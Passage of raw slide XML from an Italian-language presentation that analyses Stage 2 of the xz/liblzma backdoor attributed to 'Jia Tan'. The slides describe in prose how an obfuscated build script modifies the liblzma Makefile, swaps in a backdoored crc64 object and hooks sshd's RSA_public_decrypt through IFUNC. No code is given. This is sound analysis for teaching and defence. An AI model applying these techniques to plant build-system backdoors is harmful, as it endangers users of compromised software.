            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="37" name="Segnaposto contenuto 36" descr="Immagine che contiene schizzo, diagramma, pixel&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6400CFC6-8C27-B738-B0F7-BEBC02B5C7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433" y="7285"/>
            <a:ext cx="1676961" cy="1453403"/>
          </a:xfr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C584BB4A-FACA-4161-5F39-9ECB562902C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="138548" y="1926415"/>
            <a:ext cx="11853204" cy="458587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800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Stage 2</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2400">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Il programma </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Infected.txt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> viene eseguito per modificare il processo di compilazione.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2400">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>C'è ancora un certo grado di offuscamento. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Sembra ci siano anche script di crittografia RC4 scritti in AWK. </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Nella 5.6.1 c'è inoltre un meccanismo dell'estensione per permettere di continuare lo sviluppo attraverso l'aggiunta di nuovi file di test in </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/test/files</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2400">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Riga 20 e riga 23 controllano IFUNC abilitata sul sistema obiettivo, altrimenti exit;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Riga 29 verifica supporto </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>shared</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> libraries mentre verifica x86_64 fino a riga 41;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>...verifica che sia tutto pronto per l'installazione della backdoor...</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="24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993026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F2AFF39-6F5A-1E50-7CDE-8AAD21C2B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167" y="3300"/>
            <a:ext cx="10524738" cy="1452552"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg2"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="4000"/>
              <a:t> La strategia di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000" err="1"/>
              <a:t>jia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000"/>
              <a:t> tan</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT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A698C9B-A4EA-4166-BB4E-5F2D0E1F8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AFF03-0A74-4B45-B900-A104A13AD368}" type="datetime1">
              <a:rPr lang="it-IT"/>
              <a:t>07/06/2024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B864F53-019D-926A-DB74-BA373E3FA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83DB1B8-299C-899A-BCC9-0785B184C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73</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="37" name="Segnaposto contenuto 36" descr="Immagine che contiene schizzo, diagramma, pixel&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6400CFC6-8C27-B738-B0F7-BEBC02B5C7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433" y="7285"/>
            <a:ext cx="1676961" cy="1453403"/>
          </a:xfr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C584BB4A-FACA-4161-5F39-9ECB562902C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="138548" y="1926415"/>
            <a:ext cx="11853204" cy="495520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800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Stage 2</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2400">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Riga 106 applica le modifiche a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>liblzma</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Makefile</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>. Le nuove righe aggiunte sono anch'esse offuscate ed inserite in ordine sparso, lontane tra loro;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="2400">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Riga 113 testa il segnale che creerà una catena di eventi (che coinvolgono la funzionalità IFUNC  ed il segnale LD_BIND_NOW) che consente alla backdoor, in fase di startup del servizio </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sshd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, di inserire nella tabella di risoluzione dei simboli del </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>dynamic</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> linker la propria versione del simbolo </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>RSA_public_decrypt</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2400" i="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Riga 174 viene creata liblzma_la-crc64-fast.o, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>la </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" b="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>binary</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> contenente la backdoor</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2400">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="2400" i="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Trade Gothic Next Light"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="363243170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F2AFF39-6F5A-1E50-7CDE-8AAD21C2B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167" y="3300"/>
            <a:ext cx="10524738" cy="1452552"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg2"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="4000"/>
              <a:t> La strategia di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000" err="1"/>
              <a:t>jia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000"/>
              <a:t> tan</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT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A698C9B-A4EA-4166-BB4E-5F2D0E1F8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AFF03-0A74-4B45-B900-A104A13AD368}" type="datetime1">
              <a:rPr lang="it-IT"/>
              <a:t>07/06/2024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B864F53-019D-926A-DB74-BA373E3FA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83DB1B8-299C-899A-BCC9-0785B184C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74</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="37" name="Segnaposto contenuto 36" descr="Immagine che contiene schizzo, diagramma, pixel&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6400CFC6-8C27-B738-B0F7-BEBC02B5C7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433" y="7285"/>
            <a:ext cx="1676961" cy="1453403"/>
          </a:xfr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C584BB4A-FACA-4161-5F39-9ECB562902C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="138548" y="1926415"/>
            <a:ext cx="11853204" cy="458587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800" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Stage 2</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2400">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>liblzma_la-crc64-fast.o viene usato per sovrascrivere l'oggetto associato a crc64_fast.c.</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="2400">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:ea typeface="+mn-lt"/>
              <a:cs typeface="+mn-lt"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>In modo analogo, liblzma_la-crc32-fast.o viene usato per sovrascrivere l'oggetto associato a crc32_fast.c.</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="2400">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Durante l'iniezione, vengono definite le funzioni della backdoor che sostituiranno quelle reali, come </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>_</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>get_cpuid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> che sostituirà </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>__</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>get_cpuid</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>nel codice di XZ</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>. </a:t>
            </a:r>
            <a:endParaRPr lang="it-IT" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2400" i="1" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="342900" indent="-342900">
              <a:buFont typeface="Arial"/>
              <a:buChar char="•"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Viene in particolare definito </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" b="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>crc64_resolve</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, la funzione che consentirà alla backdoor, durante la fase di startup di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>liblzma</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>, di agganciarsi a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sshd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
              </a:rPr>
              <a:t> come descritto a riga 113.</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT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969488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F2AFF39-6F5A-1E50-7CDE-8AAD21C2B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167" y="3300"/>
            <a:ext cx="10524738" cy="1452552"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg2"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="4000"/>
              <a:t> La strategia di </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000" err="1"/>
              <a:t>jia</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="4000"/>
              <a:t> tan</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT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A698C9B-A4EA-4166-BB4E-5F2D0E1F8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AFF03-0A74-4B45-B900-A104A13AD368}" type="datetime1">
              <a:rPr lang="it-IT"/>
              <a:t>07/06/2024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B864F53-019D-926A-DB74-BA373E3FA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83DB1B8-299C-899A-BCC9-0785B184C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75</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="37" name="Segnaposto contenuto 36" descr="Immagine che contiene schizzo, diagramma, pixel&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6400CFC6-8C27-B738-B0F7-BEBC02B5C7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433" y="7285"/>
            <a:ext cx="1676961" cy="1453403"/>
          </a:xfr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C584BB4A-FACA-4161-5F39-9ECB562902C0}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="138548" y="1926415"/>
            <a:ext cx="11853204" cy="13849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800" b="1" err="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t>Recap</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="it-IT" sz="2800" b="1">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:ea typeface="+mn-lt"/>
                <a:cs typeface="+mn-lt"/>
              </a:rPr>
              <a:t> installazione</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2800" b="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="it-IT" sz="2800" b="1">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="10" name="Immagine 9" descr="Immagine che contiene testo, diagramma, schermata, Piano&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{49A7012E-D8CA-BE58-2A6A-DC9C39C9A2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3662" y="2391336"/>
            <a:ext cx="5853472" cy="4294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61446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F2AFF39-6F5A-1E50-7CDE-8AAD21C2B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167" y="3300"/>
            <a:ext cx="10512832" cy="1452552"/>
          </a:xfrm>
          <a:solidFill>
            <a:schemeClr val="bg2"/>
          </a:solidFill>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="it-IT" sz="4000"/>
              <a:t>  sommario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A698C9B-A4EA-4166-BB4E-5F2D0E1F8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AFF03-0A74-4B45-B900-A104A13AD368}" type="datetime1">
              <a:rPr lang="it-IT"/>
              <a:t>07/06/2024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B864F53-019D-926A-DB74-BA373E3FA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83DB1B8-299C-899A-BCC9-0785B184C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76</a:t>
            </a:fld>
            <a:endParaRPr lang="en-US"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="37" name="Segnaposto contenuto 36" descr="Immagine che contiene schizzo, diagramma, pixel&#10;&#10;Descrizione generata automaticamente">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6400CFC6-8C27-B738-B0F7-BEBC02B5C7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433" y="7285"/>
            <a:ext cx="1676961" cy="1453403"/>
          </a:xfrm>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="39" name="CasellaDiTesto 38">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{42A27160-7963-656C-9FB1-68F8080C23CA}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="198904" y="1792941"/>
            <a:ext cx="8634131" cy="48320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514350" indent="-514350">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="it-IT" sz="2800">
                <a:solidFill>
                  <a:schemeClr val="bg1"/>
                </a:solidFill>
                <a:latin typeface="Trade Gothic Next Light"/>
                <a:cs typeface="Calibri"/>
              </a:rPr>
              <a:t>Introduzione</a:t>
            </a:r>
            <a:endParaRPr lang="it-IT">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Trade Gothic Next Light"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buAutoNum type="arabicPeriod"/>
            </a:pPr>
            <a:endParaRPr lang="it-IT" sz="2800">
              <a:solidFill>
                <a:schemeClr val="bg1"/>
              </a:solidFill>
              <a:latin typeface="Trade Gothic Next Light"/>
              <a:cs typeface="Calibri"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="514350" indent="-514350">
              <a:buAutoNum type="arabicPeriod"/>
